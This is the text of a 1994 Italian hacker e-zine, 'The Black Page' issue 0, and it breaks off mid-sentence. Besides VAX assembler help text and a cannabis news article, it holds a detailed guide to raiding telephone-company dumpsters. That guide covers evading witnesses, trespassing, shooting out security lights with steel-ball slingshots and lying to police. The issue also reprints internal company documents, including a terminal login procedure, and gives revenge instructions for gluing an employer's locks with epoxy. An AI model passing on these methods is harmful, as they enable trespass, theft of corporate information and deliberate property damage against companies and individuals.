/SHOW[=(function[,...]) /NOSHOW[=(function[,...])] Provides initial settings for the functions controlled by the assembler directives .SHOW and .NOSHOW. You can specify one or more of the functions listed below. If you specify /SHOW without any functions, the listing level count is incremented. If you specify /NOSHOW without any functions, the listing level count is decremented. Since the /SHOW qualifier affects the listing, you must use the /LIST qualifier to produce a listing in order to use the /SHOW qualifier. CONDITIONALS Lists unsatisfied conditional code associated with .IF and .ENDC directives CALLS Lists macro calls and repeat range expansions DEFINITIONS Lists macro definitions EXPANSIONS Lists macro expansions BINARY Lists binary code generated by the expansion of macro calls If you omit the /SHOW qualifier, the default is equivalent to /SHOW=(CONDITIONALS,CALLS,DEFINITIONS). If you specify more than one function, separate them by commas and enclose the list in parentheses. For additional details on these functions, see the VAX MACRO and Instruction Set Reference Volume. /UPDATE /UPDATE[=(update-file-spec[,...])] /NOUPDATE Positional Qualifier. The /UPDATE qualifier cannot be used with the /LIBRARY qualifier. The /UPDATE qualifier requires usage with an associated input file that is to be updated with the specified update file or files. No wildcard characters are allowed in the update file specifications. The update process uses the batch editor, SLP, to update the input file with the update file or files. By default, the assembler uses update files with the same name as the input source file and a file type of UPD. When multiple update files are specified with the /UPDATE qualifier, the assembler merges the contents into a single list of updates before applying the updates to the source file. You must separate multiple update files with commas and enclose the list in parentheses. The input source file and update files are not changed by the update operation. The effects of the update appear in the compiled output. The listing also provides an audit trail of the changes if you specify /LIST with /UPDATE. If an update file is not found, the assembler prints an informational message but continues the assembly. The /NOUPDATE qualifier has the same effect as not specifying the /UPDATE qualifier, or negates the effects of any /UPDATE qualifiers specified earlier on the command line. MACRO Examples 1. $ MACRO ANALSEX The MACRO assembler assembles the file ORION.MAR and creates an object file named ANALSEX.OBJ. If this command is executed in a batch job, the assembler also creates a listing file named ORION.LIS. 2. $ MACRO/LIST SUCCHIA, LYRA/OBJECT=LYRAN This MACRO command requests two separate assemblies. The MACRO command assembles SUCCHIA.MAR to produce SUCCHIA.LIS and SUCCHIA.OBJ. Then it assembles LYRA.MAR and creates a listing file named LYRA.LIS and an object module named LYRAN.OBJ. 3. $ MACRO ALPHA/LIST+MYLIB/LIBRARY- $_ + [TEST]OLDLIB/LIBRARY + []BETA $ PRINT ALPHA The MACRO command concatenates the files ALPHA.MAR and BETA.MAR to produce an object file named ALPHA.OBJ and a listing file named ALPHA.LIS. MYLIB.MLB (in the current default directory) and OLDLIB.MLB (in the directory [TEST]) are specified as libraries to be searched for macro definitions. When macro calls are found in BETA.MAR, OLDLIB, MYLIB, and the system library STARLET.MLB are searched, in that order, for the definitions. The PRINT command prints the listing file ALPHA.LIS. 4. $ MACRO DELTA+TESTLIB/LIBRARY, ALPHA+MYLIB/LIBRARY This MACRO command requests two separate assemblies. TESTLIB.MLB and the system library STARLET.MLB are searched for macro definitions when macro calls are found in DELTA.MAR, and MYLIB.MLB and the system library STARLET.MLB are searched for macro definitions when macro calls are found in ALPHA.MAR. MACRO Directives The general assembler directives provide facilities for performing 11 types of functions; listing control, message display, assembler option, data storage, location control, program sectioning, symbol control, routine entry point, conditional and subconditional assembly, cross-reference, instruction generation, and linker option. The alternate form, if any, is given in parentheses. Additional information available: .ADDRESS .ALIGN .ASCIx .BLKx .BYTE .CROSS .DEBUG .DEFAULT .D_FLOATING_(.DOUBLE) .DISABLE_(.DSABL) .ENABLE_(.ENABL) .END .ENDC .ENDM .ENDR .ENTRY .ERROR .EVEN .EXTERNAL_(.EXTRN) .F_FLOATING_(.FLOAT) .G_FLOATING .GLOBAL_(.GLOBL) .H_FLOATING .IDENT .IF .IF_FALSE_(.IFF) .IF_TRUE_(.IFT) .IF_TRUE_FALSE_(.IFTF) .IIF .IRP .IRPC .LIBRARY .LINK .LONG .MACRO .MASK .MCALL .MDELETE .MEXIT .NARG .NCHR .NOCROSS .NTYPE .OCTA .ODD .OPDEF .PACKED .PAGE .PRINT .PSECT .QUAD .REFn .REPEAT_(.REPT) .RESTORE_PSECT_(.RESTORE) .SAVE_PSECT_(.SAVE) .SHOW_.NOSHOW .SIGNED_BYTE .SIGNED_WORD .SUBTITLE_(.SBTTL) .TITLE .TRANSFER .WARN .WEAK .WORD MACRO Instructions Additional information available: ACBx ADAWI ADDxx ADDPx ADWC AOBLxx ASHx ASHP Bxxxx BBx BBxx BBxxI BICxx BICPSW BISxx BISPSW BITx BLBx BPT BRx BSBx BUGx CALLG CALLS CASEx CHMx CLRx CMPx CMPCx CMPPx CMPxV CRC CVTxx CVTLP CVTPL CVTPS CVTPT CVTSP CVTTP DECx DIVxx DIVP EDIV EDITPC EMODx EMUL EXTxV FFx HALT INCx INDEX INSQHI INSQTI INSQUE INSV JMP JSB LDPCTX LOCC MATCHC MCOMx MFPR MNEGx MOVx MOVAx MOVCx MOVP MOVPSL MOVTC MOVTUC MOVZxx MTPR MULxx MULP NOP POLYx POPR PROBEx PUSHAx PUSHL PUSHR REI REMQHI REMQTI REMQUE RET ROTL RSB SBWC SCANC SKPC SOBGxx SPANC SUBxx SUBPx SVPCTX TSTx XFC XORxx MACRO Operand_Formats Operands for instructions identify the memory locations or the registers that are used by the machine operation. These operands specify the addressing mode for the instruction. Additional information available: Absolute Autodecrement Autoincrement Autoincrement_deferred Branch Displacement Displacement_deferred General Immediate_or_Literal Indexed Register Register_deferred Relative Relative_deferred MACRO Vector_Instructions Additional information available: Assembler_Notation VLD VGATH VST VSCAT VADDL VCMPL VMULL VSUBL VBIC,_VBIS,_and_VXOR VSL VADD VCMP VVCVT VDIV VMUL VSUB VMERGE IOTA MFVP MTVP VSYNC --------------------------------------------------------------------- Dando un'okkiara all'HELP di MACRO troverete tutto l'HELP possibile su MACRO. (Logico no ? e allora che cazzo scrivo ... mah) Nel prossimo numero di TBP probabilmente parleremo un po' di assembler vax, ma MOLTO in linea generale in quanto non sono per niente un esperto di questo argomento. Spero pero' di poter coinvolgere qualcuno che veramente se ne intende, invece di star qui da solo, come adesso, alle 6 del mattino come un coglione a non capire un cazzo di niente, con una tazza di caffe' bollente e i nervi a fior di pelle :) Scusatemi se troverete questo articolo un po' merdoso. Ma per me va benissimo cosi'. In fondo, chi se ne fotte ! :) Dupree's Paradise ----------------------------------------------------------------- The Black Page - Numero 0, Settembre 1994 - Articolo 6 DOVE/COME/QUANDO/PERCHE' FARE TRASHING Scritto da: ---------- Ice MC ---------- Con commenti della redazione by Dupree's Paradise Prefazione: ----------- Questo testo contiene le basi del trashing. Io non credo di esser molto prati- co visto ke l'ho fatto solo un paio di volte, comunque qui ci sono le basi! Trashing: Cos'e'? ----------------- Il Trashing (scarto) e' l'azione della ricerca attraverso i rifiuti presi dai bidoni della SIP o di qualunque altro Ufficio Telefonico. Lo scarto spesso contiene cose molto importanti che possono essere da blokki notes dell'ufficio per imparare ai nuovi operatori delle operazioni importanti (ad esempio.. il tracciamento di linea.. ecc.) a come funziona un telefono (schemi e cazzate simili)! In Aggiunta a quelle cose, si possono trovare anke elenchi telefoni- ci. Nel prossimo paragrafo vedremo qualke suggerimento per eseguire quando o mentre si esegue un trashing. Lo scarto puo' essere abbastanza fruttuoso e di- vertente, basta ke venga fatto con attenzione senza prendere bicchieri di caffe', merdate simili o addirittura essere arrestato! [[ Nota della Redazione : Il testo e' stato pubblicato cosi' come ci e' perve- nuto. Ice MC ci ha detto di averlo scritto durante una notte di insonnia tota- le, in preda a strane visioni mistiche .. :) ]] Primo Passo: COME LOCALIZZARE IL BERSAGLIO ------------------------------------------ Questo passo consiste nella scelta della posizione di dove far Trashing. La posizione dove dovrai andare a far Trashing e' l'Ufficio di Scambio che e' qui' dove succede tutto. Il modo piu' facile per trovare l' U.S. e' cercare parecchie antenne giganti. (non e' difficile.. di solito stanno sopra i tetti :-)) Spesso pero' in alcune citta', la spazzatura degli Uffici di Scambi non viene gettato sotto l'edificio, quindi e' piu' complicato. Io consiglio di andare alla sede centrale, dove stanno gli uffici per noleggiare telefoni, disabili- tare numeri... e a volte.. xche' no? .. Abbonarsi a Itapac :-)) Un altro posto per fare trashing e' l'Ufficio di Smistamento dati. Trovarlo e' molto semplice... questi hanno una sola porta centrale e nessuna finestra... o una sola porta e qualke finestra con 3000 sbarre (da non confondere con il carcere). [[ NdR : In poche parole, i luoghi migliori sono : La centrale che si occupa dello smistamento delle chiamate dei Cellulari, cioe' il famoso PONTE RADIO. Spesso nella stessa costruzione del Ponte Radio si trovano anche i Pad di Ita- Kaz quindi e' bene se si "trova" della spazzatura proveniente da li. In alter- nativa c'e' sempre la Sede Centrale della Sip, dove cioe' vanno i clienti per stipulare contratti, acquistare cellulari, telefoni, merdate, insomma, dove va la gente a Farsi Fottere i Soldi dal (Dis)Servizio di Stato. ]] Secondo Passo: EQUIPAGGIAMENTO ------------------------------ Ecco una piccola lista dell'equipaggiamento che potresti prendere: Auto : Porte aperte e luci spente L'auto non e' necessaria, ma e' utile x scappare veloce- mente ed e' molto meglio che camminare con 4 sacconi gi- ganti :-)) [[ NdR : Meglio non dare nell'occhio. Mai guardare direttamente eventuali per- sone, se no ci si fa accorgere che e' in preparazione qualcosa. Scendete dal- l'auto, mettetevi a chiacchierare come se niente fosse, fumate una sigaretta, finche' le persone che possono vedervi mentre "agite" non se ne sono andate. Ci vuole soprattutto pazienza. Fingete di guardare spesso l'orologio come se aveste un appuntamento ... Fate soprattutto attenzione non solo alla gente per la strada (dalle auto difficilmente si accorgono di cio' che fate) ma alla gente sui balconi dei palazzi che ha un'ottima visuale !!! Inoltre ricordate di posteggiare a circa 1 metro e mezzo dai cassonetti in modo da restare vici- ni, fare prima e occultare di piu' la visuale. ]] Persone: Piu' di uno .. ma meno di sei! Non andare mai a far trashing da solo. E non portare mai piu' di cinque persone con te. Questo potrebbe dare un po' nell'okkio.. vedere sei o sette persone con i sacchi in mano, abbigliamento scuro e torce ... potrebbero pensare a una rapina :-) Io raccomando di andare in tre, ecco un piccolo schema: Numero di persone : 1 2 3 4 5 6 Persone per prendere i sacchi : 1 1 2 3 3 4 Persone per osservare in giro : 0 1 1 1 2 2 --------- CONSIGLIATO ----------: ^ [[ NdR : Personalmente pensiamo che possa creare svariati problemi essere in piu' di 3 persone. Se dovete caricare 3 grossi sacchi su una Fiat Panda e sie- te in 4, non potrete usare i sedili posteriori. Spesso i sacchi sono piu' di 4 ... l'ideale e' essere in 2 persone. Cronometrando un'azione media si riesce a caricare tutto e ripartire, con molta calma e decisione, in circa 12 secon- di. Certo, una Station Vagon come quella di Amadeus e' l'ideale :))))) ]] Equipaggiamento: Secondo me non serve niente di speciale.. se poi credete di essere rambo...date un'okkiata all'e- quipaggiamento avanzato :-) .. Io credo che ba- sti semplicemente un abbigliamento Scuro (niente abiti fluorescenti o cose spaziali :-)) EQUIPAGGIAMENTO AVANZATO: Maschera Guanti Walkie Talkies / CB Equipaggiamento Diversivo: Fumo, Gas, Bombe, Bazzoka Se necessario porta anke qualke Mitra, Fucili, Pistole :-)) [[ Lunga nota della redazione : L'equipaggiamento. Questa e' una parte molto pittoresca scritta dal nostro Ice MC, ma e' verosimile che qualche volta si incappi in qualche contrattempo. In molte centrali la spazzatura sta ALL'IN- TERNO di recinti o di cortili delle costruzioni Sip. Quindi entrare in tali luoghi costituisce violazione di domicilio, e in ogni caso reato. In tali casi alcune persone molto intraprendenti hanno spesso usato sistemi piu' avanzati. Immaginiamo uno scenario tipo, un cortile interno recintato, con grossi fari a luce gialla e telecamere. Uno si apposta alla macchina. " partono verso il mu- retto. Altri 2 armati di Fionda da tiro professionale (costa 50 mila lire, molto accessibile a tutti) e pallini d'acciaio (gittata con tale fionda, circa 200 metri o piu', potenza di penetrazione : IMPRESSIONANTE), colpiscono ALCUNI dei fari di illuminazione, cercando di creare un corridoio oscuro per raggiun- gere la "spazzatura"). Creato il corridoio i 2 tipi in CALZAMAGLIA NERA e dal- le provate capacita' atletiche, si lanciano verso i cassonetti, afferrano i sacchi (solitamente leggeri in quanto contengono rifiuti cartacei) ed escono rapidamente. Caricato tutto in macchina si riparte PIANO, A LUCI SPENTE, per poi accelerare DOPO aver riacceso le luci a debita distanza. Altro sistema : 2 persone vestite in modo molto trasandato, su un Ape Car ca- rico con un po' di scatoloni di cartone e rottami metallici. Basta fingersi "barboni" o "robivecchi". Non ci saranno problemi a prendere dei sacchi. Nes- suno rompe i coglioni a chi cerca di farsi una pagnotta rivendendo cartoni u- sati !!! Altro metodo : PAGARE uno di questi barboni per fare il sopracitato lavoro. Con poche lire potrebbero convincersi a fare per voi il giro di ricerca, gior- nalmente. p.s. In alcune centrali i rifiuti prima di uscire vengono TRITATI E DISTRUTTI in appositi distruggi-documenti o inceneritori. Quindi aggiungiamo all'equipaggiamento avanzato : ------------------------------------------------- Per azioni Commando-Style : Calzamaglia nera o abiti scuri e comodi come tute da ginnastica, non indossare nessun oggetto luccicante. Annerire la faccia con un tappo di sughero bruciacchiato al fuoco. A portata di mano in macchina te- nete delle salviettine umidificate per ripulire il viso subito dopo l'azione. Fionda da tiro professionale con fermabraccio e pallini di ac- ciaio da tiro o sferette in vetro. Per azioni Barbon-Style : ApeCar, Vestiti trasandati, barba lunga, capelli sporchi, e meglio se si puzza come porci. Fine nota della Redazione ]] Cosa Fare e Cosa NON Fare: -------------------------- >Fatelo di notte. >Dopo aver preso i sacchi fai l'ordinamento a casa o in qualsiasi altro posto diversamente dal parkeggio dell'Ufficio. [[ Traduzione : Cercate un posto tranquillo per esaminare i sacchi, un garage con luce elettrica, una villetta di un amico, una seconda casa vuota, un posto lontano da occhi indiscreti e dove sia possibile esaminare con calma ogni frammento cartaceo. ]] >Non usare l'Equipaggiamento Diversivo a meno che non sia davvero necessario. >Non ti cagare addosso quando lo fai. [[ NdR : In caso di cagata addosso, abbandonare l'attivita' ]] >Non chiudere nessuno del gruppo in un bidone ! :-))) Parlando di Sicurezza/Polizia: ------------------------------ Allora.. parlando di sicurezza, non so quali siano i pericoli del trashing vi- sto che non sono mai stato preso :-) Comunque credo che non si possa rubare l'immondizia alle societa' telefoniche. Comunque, se vi capita di esser presi (toccando balle) .. trovate qualke scusa del tipo... che il vostro pallone e' andato a finire x caso dentro il bidone e lo state cercando.. oppure dite che state cercando taccuini per la scuola. Un modo per evitare di farsi prendere e' fare il trashing di notte (tardi). [[ NdR : Il problema legale e' una questione importante. Purtroppo nella ns sede non esiste alcun libro di legge, quindi per ora non possiamo controllare. Vero e' che dovrebbe essere vietato appropriarsi della spazzatura, in USA cio' costituisce violazione di domicilio. Ma ai barboni che scavano nei cassonetti nessuno va a rompere i coglioni. E COMUNQUE SPESSO i cassonetti sono 2 soli per un quartiere intero, cio' significa che gran parte della roba sta FUORI DAL CASSONETTO e quindi trattasi di roba "trovata" :)) E vi assicuro che questo accade MOLTO SPESSO !!! ]] Conclusione: ------------ Ke dire?!?!.. non so nemmeno come ho fatto a scriverlo.. non kiedetemelo co- munque.. l'autore si declina da ogni responsabilita'... se dopo aver fatto trashing.. usate ad esempio una bomba contro la societa'telefonica .. so' caz- zi vostri!!! :-))))) Ice MC [[ NdR : Che dire ? Ci associamo ad Ice MC, non sapendo come abbia fatto a scrivere un testo del genere. Mah ! Comunque sia e' stato molto divertente ! :)))) ]] ----------------------------------------------------------------- The Black Page - Numero 0, Settembre 1994 - Articolo 7 ============================================================================== -------------- /----------------\ Benvenuti | N. U. | _____/\----- | | all' _____/\----- \____________/ _____/\----- o o ANGOLO _____/\----- SIP - TELECOM Notizie fresche di cassonetto a cura di Ice MC ============================================================================== Attenzione : In alcuni casi i documenti da noi pubblicati hanno subito delle "censure", che si renderanno automaticamente evidenti nel contesto della lettura :). Cio' per evitare problemi sia a noi sia a chiunque possa sentirsi in qualche modo "disturbato" dal contenuto di cio' che seguira'. ============================================================================== Estratto da "Selezionando", Mensile aziendale della SIP Anno XII numero 2, Febbraio 1992 Pagina 20 I COSTI DEL VANDALISMO ====================== Nel 1990 la Sip ha subito, per furti ed atti di vandalismo alle apparec- chiature telefoniche, una perdita complessiva di circa 15 miliardi e 200 mi- lioni. Lo ha evidenziato l'elaboratore dei dati pervenuti dalle DR in una ricerca della Protezione Aziendale. Di questi, circa 14 miliardi e 500 milioni sono per "danni diretti" (furti di gettoni, danni ad apparecchi e cabine telefoniche) e 700 milioni per "danni indiretti" (mancati introiti). Si riscontra dunque rispetto al 1989 un incre- mento del 40% circa. Pressoche' invariato rispetto all'anno precedente e' rimasto invece il numero complessivo dei danneggiamenti (circa 109000) a dimostrazione di una maggiore pesantezza dei singoli atti. Distribuzione del fenomeno sul territorio ----------------------------------------- Il fenomeno si e' manifestato quasi ovunque con perdite superiori al miliardo di lire. Cifre x 1000 : 3.300.000 nel Lazio (22% del totale, 2.000.000 nel 1989) 2.700.000 in Sicilia (18% del totale, 3.100.000 nel 1989) 1.700.000 in Campania/Basilicata (11% del totale, 1.100.000 nel 1989) 1.400.000 in Emilia Romagna (10% del totale, 900.000 nel 1989) 1.300.000 in Toscana (600.000 nel 1989) Se si considera il danno globale medio per singolo evento (rapporto tra perdi- ta subita e numero eventi) il primato negativo spetta ad altre DR, cioe' ad Abruzzo-Molise (421000 ad evento), alla Liguria (276000 ad evento), al Friuli v.g. (276000) ed a Piemonte-Val d'Aosta (240000), tutte al di sopra della me- dia nazionale (207000). DANNI DIRETTI ------------- I danni maggiori sono sati quelli relativi agli apparecchi telefonici (com- plessivamente 9.100.000.000) con un incidenza massima di 2.100.000.000 in Si- cilia, 1.300.000.000 in Campania, e 1 miliardo nel Lazio. I furti di gettoni e monete hanno determinato un danno complessivo di circa 4 miliardi e 100 milioni. CAUSE E SOLUZIONI ================= Il significativo incremento delle perdite complessive subite nel settore dell'Azienda e' dovuto all'elevato numero di danni agli apparecchi Rotor (520 circa nel 1989, 2384 nel 1990) : si devono tuttavia tenere presenti sia l'au- mento della consistenza di tali apparecchiature, sia l'accresciuta "specializ- zazione" degli autori di tali eventi criminosi. Per limitare il piu' possibile i danni che comportano, oltre a perdite econo- miche di notevole portata, un rilevante discapito all'immagine dell'azienda, sono state intraprese da parte dei settori competenti varie iniziative. Innanzitutto e' stata modificata la struttura dell'apparecchio (rafforzamento della piastra frontale dello sportello-cassaforte, inserimento di ganci di chiusura con perni di riscontro per lo sportello dell'apparecchio, montaggio di 2 serrature di sicurezza); poi sono stati individuati, per i servizi di Ve- rifica dell'Efficienza della Protezione degli Impianti (VEPI), itinerari che includano localita' ove sono ubicate apparecchiature piu' frequentemente dan- neggiate; e' inoltre in corso una costante sensibilizzazione delle forze dell'ordine (nel quadro dei rapporti sistematicamente intrattenuti) e dei ge- stori degli apparecchi. Un'ultima soluzione : e' in corso uno studio diretto a valutare la possibili- ta' di dotare di allarme gli apparecchi telefonici piu' esposti. Il tutto per "ANNIENTARE" il vandalismo, questa grave forma di disintroito per l'Azienda. ---------------------------------------------------------------------------- 17.8.94 Legoland PROTOCOLLO :941700D54000612 SIGLA FUNZIONE EMITTENTE : IS RIF.TO NS. : RIF.TO VS. : DA : DR/SI A : DR/SI-M R RE L PRC RSI PO RSI A OTBU/S2 OTTP/S2 FILIALI TUTTE UTR TUTTE UCTP TUTTE AOR TUTTE AREE DI VENDITA TUTTE AREE ASSISTENZA TECNICA BUSINESS A2/a3 Oggetto: Predisposizioni per l'avvio di TELECOM ITALIA S.p.a In relazione alla nascita di TELECOM ITALIA vi informiamo che, a partire dal 18/08/94, il protocollo per tutta la corrispondenza dovra' essere unico, iniziando dal numero uno; tutta la corrispondenza esterna (carta intestata, ordinazioni, bolle di accompagnamento etc.) e le relative buste dovranno riportare il nuovo logo, avendo cura di barrare il vecchio. Con plico a parte vi inviamo i timbri che dovranno essere usati in questa fase transitoria. Sara' nostra cura inviarvi, appena definita, la nuova carta intestata verso terzi. A disposizione per gli eventuali chiarimenti che si rendessero necessari, porgiamo cordiali saluti. F. Molla ---------------------------------------------------------------------------- Da un ritaglio di carta : PROCEDURA PER L'USO DEL TERMINALE ================================= ACCERTARE CHE L'INTERRUTTORE GENERALE SIA INSERITO. " " " " DEL VIDEO SIA INSERITO. COMPORRE MEDIANTE LA TASTIERA LA SIGLA "CIC521MA" E PIGIARE IL TASTO ENTER. COMPORRE MEDIANTE LA TASTIERA LA SIGLA "CIC5-V5" E PIGIARE CONTEMPORANEAMENTE AL TASTO ALT IL TASTO CLEAR. COMPORRE MEDIANTE LA TASTIERA LA SIGLA "SIAR" E PI= GIARE IL TASTO ENTER. INSERIRE MEDIANTE LA TASTIERA IL NUMERO DI CODICE DELL'OPERATORE E LA PAROLA CHIAVE QUINDI PIGIARE IL TASTO ENTER. N.B. CON IL TASTO CLEAR SI RITORNA ALLA PAGINA PRECEDENTE E CON IL TASTO ENTER SI VA ALLA PAGINA SUCCESSIVA. IN CASO DI GUASTO TELEFONARE AI N. TELEFO= NICO 5722122 , 5722169 E 5723287 DI TORINO PREFISSO 011. ---------------------------------------------------------------------------- SIP Linea Territoriale Personale Organizzazione Legoland C O M U N I C A T O Si informano tutti i lavoratori interessati che a partire dal 18 giugno e sino al 07 settembre un notiziario quotidiano su tutti i soggiorni estivi potra' essere ascoltato formando il numero verde relativo ai soggiorni di seguito elencati: SOGGIORNO Numero verde per notiziario giornaliero LIZZANO ------- Soggiorno di vacanze "SIP" 167/011115 Villaggio Europa 40042 - LIZZANO IN BELVEDERE (BO) tel. 0534/53033 GRESSONEY --------- Soggiorno di vacanze SIP 167/860012 Frazione Cioarde 11025 - GRESSONEY ST. JEAN (AO) tel. 0125/355431 PRAGELATO --------- Soggiorno di vacanze "Casa Alpina" 167/010115 "Don Barra" Frazione Soucheres Basses 10060 - PRAGELATO (TO) tel. 0122/78250 AURONZO ------- Soggiorno di vacanze "Domenico Savio" 167/860001 Localita' Cosderuoibe 32041 - AURONZO dI CADORE (BL) tel. 0435/97311 PIANI DI LUZZA -------------- Comunita' A Soggiorno di vacanze "Piani di Luzza" 167/861043 33020 - FORNI AVOLTRI (UD) tel. 0433/72366 - 72348 Comunita' B Soggiorno di vacanze "Piani di Luzza" 167/861043 33020 - FORNI AVOLTRI (UD) tel. 0433/72339 - 72334 [N.d.R. Belle eh ? Le vacanze SIP sovvenzionate dal sangue che versiamo in bollette telefoniche ... anche il Numero verde, hanno ... #|( ] ---------------------------------------------------------------------------- E per finire .... la chicca ... A Grande richiesta.. LA SIP PARADE !!! Trascritta da ICE MC A cura degli OPERATORI SIP CornFlakes girl - Tori amos Se tu non torni - miguel bose' I believe Now and forever Sleeping in a car - roxette Right in The night - jam & spoon move on baby - cappella Thing about the way - ice mc Ho voglia d'innamorarmi - baccini Mm Mm Mm Mm - Crash Test Dummies Quando tramonta il sole - vernice Io muoio per te - Tozzi Gente - L. Pausini [N.d.R : Questa e' la lista completa della Hit Parade SIP.. ricopiata in ogni singola lettera dal foglio trovato ..hahhaha... notare l'accuratezza usata nella lingua inglese :-))) Ice MC ] ---------------------------------------------------------------------------- ----------------------------------------------------------------- The Black Page - Numero 0, Settembre 1994 - Articolo 8 =========== MARIA JUANA =========== LA CANAPA INDIANA, CHE SOLLIEVO Dal Manifesto del 11 agosto 1994 - di A.P. La notizia e' arrivata un paio di giorni fa dalla Gran Bretagna: il ministero della sanita' inglese starebbe esaminando la possibilita' di autorizzare la somministrazione della cannabis (cioe' di hashish e marijuana) sotto controllo medico. Cioe' il Paese e' a un passo dall'equipararla ai farmaci e sommini- strarla in ospedale e, forse addirittura, consentirne la vendita nelle farma- cie, naturalmente dietro prescrizione medica. Il suo uso, affermano gli scienziati inglesi, sarebbe assai utile nelle tera- pie del dolore per i malati terminali. Come e' noto, gia' la morfina viene am- piamente utilizzata a tale scopo perche' ha capacita' analgesiche, ma la can- nabis, che in tutto il mondo viene assimilata alle droghe e percio' vietata, non ha mai neppure potuto godere del riconoscimento della efficacia terapeuti- ca ed e' percio' esclusa dalla farmacopea ufficiale. Ma nel rapporto danno-beneficio, quale posto spetta alla cannabis e quale alle comuni medicine? Un occhio di attenzione agli interessi delle industrie farma- ceutiche non guasterebbe. Anche perche', come dimostrano numerosi studi e pa- reri scientifici, gli effetti della cannabis si estendono ben al di la' del solo uso antidolore. Ci riferiamo, in particolare, ad un recente studio di due ricercatori inglesi, Grinspoon e Bakalar ("Marijuana: the forbidden medicine", Yale Univ. Press, New Haven, London, 1993) che hanno effettuato un'ampia e aggiornata ricogni- zione su tutti i possibili usi terapeutici della cannabis (ne ha scritto, sul manifestomese del gennaio 1994 dal titolo "Farmotraffico", Giancarlo Arnao) pur non potendo compiere ricerche organiche, come avviene nel casi dei farma- ci, a causa della illegalita' della sostanza. La cura delle malattie I due ricercatori inglesi hanno individuato almeno otto differenti impieghi della sostanza: nei casi di glaucoma. E' necessario ricordare il caso dell'a- mericano Randall, affetto da glaucoma, il quale dopo una lunga battaglia, e' riuscito ad ottenere "legalmente" per alcuni mesi per se' e per altri otto am- malati di glaucoma, cancro, sclerosi multipla, dolori cronici e Aids, una quantita' di marijuana pari a trecento sigarette al mese. Nei casi di glauco- ma, infatti, scrivono Grinspoon e Bakalar, la cannabis ha dimostrato di poter sostituire con maggior efficacia, altri farmaci che implicavano pesanti effet- ti collaterali. Altro impiego che ha dato buoni risultati, quello nel combattere l'inappetenza in chi e' sottoposto a chemioterapia. Nei casi di epilessia, sono stati ri- scontrati effetti benefici e puo' sostituire i farmaci anticonvulsivi (che provocano molti effetti collaterali) e cosi' anche nella sclerosi multipla in sostituzione dei farmaci tranquillanti in alte dosi. La marijuana e' stata ef- ficacemente sperimentata anche nella paraplegia e quadriplegia in sostituzione di oppioidi o tranquillanti. Infine, con risultati positivi riscontrati in qualche caso, gli effetti bene- fici della cannabis si sono visti nei cadi di dolori cronici e di cefalee come anche nelle depressioni, in sostituzione dei farmaci antidepressivi. Nonostante questa ampia letteratura, e nonostante la stessa Dea (la polizia antidroga statunitense) abbia dovuto ammettere che "la cannabis e' una delle sostanze farmacologicamente piu' sicure", il governo Usa ha rifiutato di in- cludere hashish e marijuana nella categoria dei farmaci liberamente prescrivi- bili dai medici privati. Per i malati di Aids La questione dell'uso terapeutico della cannabis e' diventata cruciale con la diffusione dell'Aids che viene curato con farmaci chemioterapici. L'obiezione piu' frequesnte all'uso terapeutico della cannabis riguarda la sua presunta capacita' di produrre assuefazione. Numerosissimi studi hanno dimostrato che la sostanza non produce assuefazione, e, per converso, i farmaci che andrebbe a sostituire sono in genere assai tossici: nel caso delle epilessie, ad esem- pio, gli anti-convulsivanti possono provocare anemie, disturbi emotivi e ri- schi di overdose mortali; per la sclerosi multipla alti dosaggi di tranquil- lanti provocano letargie e dipendenza; nella paraplegia, che viene "curata" con oppiacei, i risci di dipendenza dalla sostanza sono svidenti; gli antide- pressivi possono provocare insonnia, impotenza, nausea, danni al cuore e ai reni. Infine, da recenti studi sembra che il tetraidrocannabinolo (la sostanza contenuta nella cannabis) sia gia' presente naturalmente nel corpo umano, piu' esattamente nella milza. Quella imboccata dal governo inglese sembra una strada destinata ad essere percorsa da molti, non solo nei paesi piu' tolleranti e "liberali" nei con- fronti dell'uso della cannabis, come l'Olanda. In Italia la legge Jervolino- Vassalli consente l'uso terapeutico delle sostanze stupefacenti intenndendo con cio' quelle contenute nella farmacopea ufficiale. Percio' assistiamo al paradosso che gli oppiacei possono essere usati (come si sa producono dipen- denza) mentre i derivati dalla cannabis, che non producono dipendenza, ne' al- tri effetti collaterali, sono rigorosamente vietati. [N.d.R. Governo Bastaaaaardoooooooooo !!! ] ----------------------------------------------------------------------------- ----------------------------------------------------------------- The Black Page - Numero 0, Settembre 1994 - Articolo 9 ARMI E BAGAGLI Cioe' ANARCHIA SPICCIOLA PER FARE CASINO by Dupree's Paradise ----------------------------- Innanzitutto una premessa : Le informazioni che seguono sono facilmente reperibili su pubblicazioni gia' esistenti in librerie o edicole, come la rac- colta "Commando", o il "Manuale del terrorista". Quindi, se tale materiale viene tranquillamente pubblicato su libri o riviste, perche' non scriverlo in un file e renderlo pubblico ? NON E' VIETATO ! :) PARTE 1 - Vendette. =================== Alcune volte i casi della vita sono strani. Ogni tanto qualcuno ci fa ve- ramente del male, e scatta in noi il desiderio di rivincita che e' insito nel nostro orgoglio personale. Ora, o reprimiamo questo nostro desiderio, scate- nando pero' delle frustrazioni che ci porteranno ad essere nervosi ed irrita- ti, opure ci LIBERIAMO di questi veleni anziche' accumularli. Liberarsi vuol dire quindi AGIRE per dar sfogo (controllato) al nostro istinto che vuole prendersi la rivincita. Possiamo quindi immaginare che una persona "A" che ha subito molto, MOL- TO, da un'altra persona "B", desideri "vendicarsi" della persona "B" in modo da prendersi una rivincita morale e sentirsi quindi meglio, piu' sollevato, felice, in pace con se', sicuro di aver fatto la cosa giusta. Proviamo ad immaginare alcuni scenari. -------------------------------------- 1> Impiegato licenziato dal datore di lavoro -------------------------------------------- L'impiegato in questione odia a morte i datori di lavoro. Questo impiega- to "A" lavorava in una sede chiusa da porte blindate e vetri anch'essi blinda- ti. Il tutto con una serratura particolare, blindata, incassata nella porta blindata, insomma cazzo, tutto blindato, ok ? L'impiegato acquista diversi prodotti. Qui lo scenario si fa variabile. Acquista ad esempio della resina epossidica in tubettu, del Silicone, della resina termoindurente speciale ad uso industriale, o del semplice Attack. E' facile, nottetempo, far COLARE l'intero contenuto del tubetto dentro l'UNICA serratura di accesso della sede. Idem dicasi per le porte della mac- china del datore di lavoro che cosi' non potra' infilare le chiavi. E' fonda- mentale scegliere una resina che sia difficile da sciogliere con solventi ... e se possibile resistente al fuoco. 2) Persona frustrata dal sistema. --------------------------------- Capita a volte che qualcuno si senta oppresso da tutta una serie di cose. Ad esempio puo' capitare di sentirsi repressi a causa dell'esosita' e delle ladronerie delle compagnie telefoniche (nel ns caso, una : la SIP). Quindi possiamo immaginare una persona che cerchi di sfogare queste sue frustrazioni tramite deplorevoli atti di vandalismo, cercando pero' delle soddisfazioni nel modo con cui questi atti 